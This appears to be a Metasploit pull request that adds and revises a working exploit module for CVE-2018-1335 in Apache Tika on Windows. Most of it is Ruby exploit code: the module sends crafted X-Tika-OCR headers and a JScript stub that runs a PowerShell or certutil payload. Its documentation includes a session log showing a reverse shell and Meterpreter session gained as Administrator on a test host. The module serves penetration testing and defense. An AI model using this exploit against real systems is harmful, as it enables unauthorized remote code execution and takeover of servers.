### PR TITLE
Apache Tika CVE-2018-1335 RCE

### DIFF
--- a/documentation/modules/exploit/windows/http/apache_tika_jp2_jscript.md
+++ b/documentation/modules/exploit/windows/http/apache_tika_jp2_jscript.md
@@ -1,0 +1,50 @@
+## Vulnerable Application
+
+  This module should work against Windows installations of Apache Tika 1.7 - 1.17, and was successfully tested on
+  1.17.  Apache Tika can be downloaded from [here](https://archive.apache.org/dist/tika/), and requires Java to be installed.
+
+  Rhino Security Labs has an Excellent write-up describing this vulnerability.  Find it on
+  [rhinosecuritylabs.com](https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/) or
+  [wayback](https://web.archive.org/web/20190314101650/https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/).
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploits/windows/http/apache_tika_jp2_jscript```
+  4. Do: ```run```
+  5. You should get a shell.
+
+## Scenarios
+
+### 1.17 on Windows 2012 running as Administrator
+
+```
+resource (tika.rb)> use exploits/windows/http/apache_tika_jp2_jscript
+resource (tika.rb)> set rhost 2.2.2.2
+rhost => 2.2.2.2
+resource (tika.rb)> set verbose true
+verbose => true
+resource (tika.rb)> check
+[*] Apache Tika Version Detected: 1.17
+[+] 2.2.2.2:9998 - The target is vulnerable.
+resource (tika.rb)> run
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Powershell command length: 2278
+[*] Sending PUT request to 2.2.2.2:9998/meta
+[*] Sending stage (179779 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49313) at 2019-03-28 21:33:09 -0400
+
+meterpreter > getuid
+Server username: WIN-OBKF2JFCDKL\Administrator
+meterpreter > getpid
+Current pid: 1552
+meterpreter > sysinfo
+Computer        : WIN-OBKF2JFCDKL
+OS              : Windows 2012 (Build 9200).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+```

--- a/documentation/modules/exploit/windows/http/apache_tika_jp2_jscript.md
+++ b/documentation/modules/exploit/windows/http/apache_tika_jp2_jscript.md
@@ -1,8 +1,9 @@
 ## Vulnerable Application
 
-  This module works against Windows installations of Apache Tika 1.17, and was successfully tested on
-  1.17.  Apache Tika can be downloaded from [here](https://archive.apache.org/dist/tika/), and requires Java to be installed.
-  While the vulnerability is reported in more versions, exploitation was only successful against 1.17.
+  This module works against Windows installations of Apache Tika 1.15-1.17, and was successfully tested on
+  1.15-1.17.  Apache Tika can be downloaded from [here](https://archive.apache.org/dist/tika/), and requires Java to be installed.
+  While the vulnerability is reported in more versions, exploitation was only successful against > 1.14 when jp2 was added as per
+  [this comment](https://github.com/rapid7/metasploit-framework/pull/11653#issuecomment-516159557).
 
   Rhino Security Labs has an Excellent write-up describing this vulnerability.  Find it on
   [rhinosecuritylabs.com](https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/) or

--- a/documentation/modules/exploit/windows/http/apache_tika_jp2_jscript.md
+++ b/documentation/modules/exploit/windows/http/apache_tika_jp2_jscript.md
@@ -1,7 +1,8 @@
 ## Vulnerable Application
 
-  This module should work against Windows installations of Apache Tika 1.7 - 1.17, and was successfully tested on
+  This module works against Windows installations of Apache Tika 1.17, and was successfully tested on
   1.17.  Apache Tika can be downloaded from [here](https://archive.apache.org/dist/tika/), and requires Java to be installed.
+  While the vulnerability is reported in more versions, exploitation was only successful against 1.17.
 
   Rhino Security Labs has an Excellent write-up describing this vulnerability.  Find it on
   [rhinosecuritylabs.com](https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/) or

--- a/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
+++ b/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
@@ -15,13 +15,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'           => 'Apache Tika Header Command Injection',
       'Description'    => %q{
           This module exploits a command injection vulnerability in Apache
-        Tika 1.7-1.17 on Windows.  A file with the image/jp2 content-type is
+        Tika 1.17 on Windows.  A file with the image/jp2 content-type is
         used to bypass magic bytes checking.  When OCR is specified in the
         request, parameters can be passed to change the parameters passed
         at command line to allow for arbitrary JScript to execute.  A
-        JScript stub is passed to execute arbitrary code.
-        When a This module was verified against version
-        1.17 on Windows 2012.
+        JScript stub is passed to execute arbitrary code. This module was 
+        verified against version 1.17 on Windows 2012.
+        While the CVE and finding show more versions vulnerable, during
+        testing it was determined only 1.17 was exploitable by this module.
       },
       'License'        => MSF_LICENSE,
       'Privileged'     => false,
@@ -78,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res.body =~ /Apache Tika (\d.[\d]+)/
       version = Gem::Version.new($1)
       vprint_status("Apache Tika Version Detected: #{version}")
-      if version.between?(Gem::Version.new('1.7'), Gem::Version.new('1.17'))
+      if version == Gem::Version.new('1.17')
         return CheckCode::Vulnerable
       end
     end

--- a/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
+++ b/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
         Tika 1.7-1.17 on Windows.  A file with the image/jp2 content-type is
         used to bypass magic bytes checking.  When OCR is specified in the
         request, parameters can be passed to change the parameters passed
-        at command line to allow for arbitrary JScript to execute.  A 
+        at command line to allow for arbitrary JScript to execute.  A
         JScript stub is passed to execute arbitrary code.
         When a This module was verified against version
         1.17 on Windows 2012.
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Apr 25 2018',
-      'Author' => 
+      'Author' =>
         [
           'h00die', # msf module
           'David Yesland @Daveysec', #edb submission
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ]))
 
     register_options(
-      [ 
+      [
         Opt::RPORT(9998),
         OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])
       ])
@@ -76,19 +76,16 @@ class MetasploitModule < Msf::Exploit::Remote
     jscript="var oShell = WScript.CreateObject('WScript.Shell');\n"
     jscript << "var oExec = oShell.Exec(\"cmd /c #{pay}\");"
 
-    #print_status(pay)
-    #print_status(jscript)
-
     print_status("Sending PUT request to #{peer}#{normalize_uri(target_uri, 'meta')}")
     res = send_request_cgi({
              'method' => 'PUT',
              'uri'    => normalize_uri(target_uri, 'meta'),
              'headers' => {
-                "X-Tika-OCRTesseractPath" => '"cscript"', 
-		"X-Tika-OCRLanguage"      => "//E:Jscript", 
-		"Expect"                  => "100-continue", 
-		"Content-type"            => "image/jp2", 
-		"Connection"              => "close"},
+                "X-Tika-OCRTesseractPath" => '"cscript"',
+                "X-Tika-OCRLanguage"      => "//E:Jscript",
+                "Expect"                  => "100-continue",
+                "Content-type"            => "image/jp2",
+                "Connection"              => "close"},
              'data' => jscript
            })
     unless res

--- a/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
+++ b/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Powershell
 
@@ -27,7 +28,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'       => 'win',
       'Targets'        =>
         [
-          ['Automatic', {'Arch' => [ARCH_X86, ARCH_X64]}]
+          ['Windows',
+            {'Arch' => [ARCH_X86, ARCH_X64],
+            'Platform' => 'win',
+            'CmdStagerFlavor' => ['certutil']
+            }
+          ]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Apr 25 2018',
@@ -49,6 +55,11 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(9998),
         OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])
+      ])
+
+    register_advanced_options(
+      [
+        OptBool.new('ForceExploit', [true, 'Override check result', false])
       ])
   end
 
@@ -74,11 +85,10 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Safe
   end
 
-  def exploit
-    pay = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)
-    pay = pay.gsub(/"/, '\"') # RIP use_single_quote=true
+  def execute_command(cmd, opts = {})
+    cmd.gsub(/"/, '\"')
     jscript="var oShell = WScript.CreateObject('WScript.Shell');\n"
-    jscript << "var oExec = oShell.Exec(\"cmd /c #{pay}\");"
+    jscript << "var oExec = oShell.Exec(\"cmd /c #{cmd}\");"
 
     print_status("Sending PUT request to #{peer}#{normalize_uri(target_uri, 'meta')}")
     res = send_request_cgi({
@@ -92,12 +102,20 @@ class MetasploitModule < Msf::Exploit::Remote
                 "Connection"              => "close"},
              'data' => jscript
            })
-    unless res
-      print_error('No server response, check configuration')
+
+    fail_with(Failure::Disconnected, 'No server response') unless res
+    unless (res.code == 200 && res.body.include?('tika'))
+      fail_with(Failure::UnexpectedReply, 'Invalid response received, target may not be vulnerable')
+    end
+  end
+
+  def exploit
+    checkcode = check
+    unless checkcode == CheckCode::Vulnerable || datastore['ForceExploit']
+      print_error("#{checkcode[1]}. Set ForceExploit to override.")
       return
     end
-    unless (res.code == 200 && res.body.include?('tika'))
-      print_error('Invalid response received, target may not be vulnerable')
-    end
+
+    execute_cmdstager(linemax: 8000)
   end
 end

--- a/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
+++ b/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
@@ -56,11 +56,15 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
              'uri'    => normalize_uri(target_uri),
            })
-    unless res || res.code != 200
+    if res.nil?
+      vprint_error('No server response, check configuration')
+      return CheckCode::Safe
+    elsif res.code != 200
       vprint_error('No server response, check configuration')
       return CheckCode::Safe
     end
-    if res.body =~ /Apache Tika (\d.[\d]+) Server/
+
+    if res.body =~ /Apache Tika (\d.[\d]+)/
       version = Gem::Version.new($1)
       vprint_status("Apache Tika Version Detected: #{version}")
       if version.between?(Gem::Version.new('1.7'), Gem::Version.new('1.17'))

--- a/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
+++ b/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
@@ -1,0 +1,102 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Tika Header Command Injection',
+      'Description'    => %q{
+          This module exploits a command injection vulnerability in Apache
+        Tika 1.7-1.17 on Windows.  A file with the image/jp2 content-type is
+        used to bypass magic bytes checking.  When OCR is specified in the
+        request, parameters can be passed to change the parameters passed
+        at command line to allow for arbitrary JScript to execute.  A 
+        JScript stub is passed to execute arbitrary code.
+        When a This module was verified against version
+        1.17 on Windows 2012.
+      },
+      'License'        => MSF_LICENSE,
+      'Privileged'     => false,
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          ['Automatic', {'Arch' => [ARCH_X86, ARCH_X64]}]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 25 2018',
+      'Author' => 
+        [
+          'h00die', # msf module
+          'David Yesland @Daveysec', #edb submission
+          'Tim Allison @_tallison' #discovery
+        ],
+      'References' =>
+        [
+          ['EDB', '46540'],
+          ['URL', 'https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/'],
+          ['URL', 'https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E'],
+          ['CVE', '2018-1335']
+        ]))
+
+    register_options(
+      [ 
+        Opt::RPORT(9998),
+        OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])
+      ])
+  end
+
+  def check
+    res = send_request_cgi({
+             'uri'    => normalize_uri(target_uri),
+           })
+    unless res || res.code != 200
+      vprint_error('No server response, check configuration')
+      return CheckCode::Safe
+    end
+    if res.body =~ /Apache Tika (\d.[\d]+) Server/
+      version = Gem::Version.new($1)
+      vprint_status("Apache Tika Version Detected: #{version}")
+      if version.between?(Gem::Version.new('1.7'), Gem::Version.new('1.17'))
+        return CheckCode::Vulnerable
+      end
+    end
+    CheckCode::Safe
+  end
+
+  def exploit
+    pay = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)
+    pay = pay.gsub(/"/, '\"') # RIP use_single_quote=true
+    jscript="var oShell = WScript.CreateObject('WScript.Shell');\n"
+    jscript << "var oExec = oShell.Exec(\"cmd /c #{pay}\");"
+
+    #print_status(pay)
+    #print_status(jscript)
+
+    print_status("Sending PUT request to #{peer}#{normalize_uri(target_uri, 'meta')}")
+    res = send_request_cgi({
+             'method' => 'PUT',
+             'uri'    => normalize_uri(target_uri, 'meta'),
+             'headers' => {
+                "X-Tika-OCRTesseractPath" => '"cscript"', 
+		"X-Tika-OCRLanguage"      => "//E:Jscript", 
+		"Expect"                  => "100-continue", 
+		"Content-type"            => "image/jp2", 
+		"Connection"              => "close"},
+             'data' => jscript
+           })
+    unless res
+      print_error('No server response, check configuration')
+      return
+    end
+    unless (res.code == 200 && res.body.include?('tika'))
+      print_error('Invalid response received, target may not be vulnerable')
+    end
+  end
+end

--- a/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
+++ b/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
@@ -15,14 +15,15 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'           => 'Apache Tika Header Command Injection',
       'Description'    => %q{
           This module exploits a command injection vulnerability in Apache
-        Tika 1.17 on Windows.  A file with the image/jp2 content-type is
+        Tika 1.15 - 1.17 on Windows.  A file with the image/jp2 content-type is
         used to bypass magic bytes checking.  When OCR is specified in the
         request, parameters can be passed to change the parameters passed
-        at command line to allow for arbitrary JScript to execute.  A
-        JScript stub is passed to execute arbitrary code. This module was 
-        verified against version 1.17 on Windows 2012.
+        at command line to allow for arbitrary JScript to execute. A
+        JScript stub is passed to execute arbitrary code. This module was
+        verified against version 1.15 - 1.17 on Windows 2012.
         While the CVE and finding show more versions vulnerable, during
-        testing it was determined only 1.17 was exploitable by this module.
+        testing it was determined only > 1.14 was exploitable due to
+        jp2 support being added.
       },
       'License'        => MSF_LICENSE,
       'Privileged'     => false,
@@ -41,8 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author' =>
         [
           'h00die', # msf module
-          'David Yesland @Daveysec', #edb submission
-          'Tim Allison @_tallison' #discovery
+          'David Yesland', # edb submission
+          'Tim Allison' # discovery
         ],
       'References' =>
         [
@@ -79,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res.body =~ /Apache Tika (\d.[\d]+)/
       version = Gem::Version.new($1)
       vprint_status("Apache Tika Version Detected: #{version}")
-      if version == Gem::Version.new('1.17')
+      if version.between?(Gem::Version.new('1.15'), Gem::Version.new('1.17'))
         return CheckCode::Vulnerable
       end
     end


### PR DESCRIPTION
Fixes #11556

This module exploits an RCE in Apache Tika v 1.7-1.17.
Its Extremely simple, I simply ported the python module to ruby and the framework.

@DaveYesland if you wanted different attribution in this, let me know.

Install is easy, install java, download the sever jar `java -jar <server.jar> -h <ip>`.

## Verification

- [x] Start `msfconsole`
- [x] `use exploits/windows/http/apache_tika_jp2_jscript`
- [x] `set rhost`
- [x] `expoit`
- [x] **Verify** you get a shell
- [x] **Document** looks good.  It's VERY simplistic since @DaveYesland did an AWESOME write-up and everyone should just reference that.

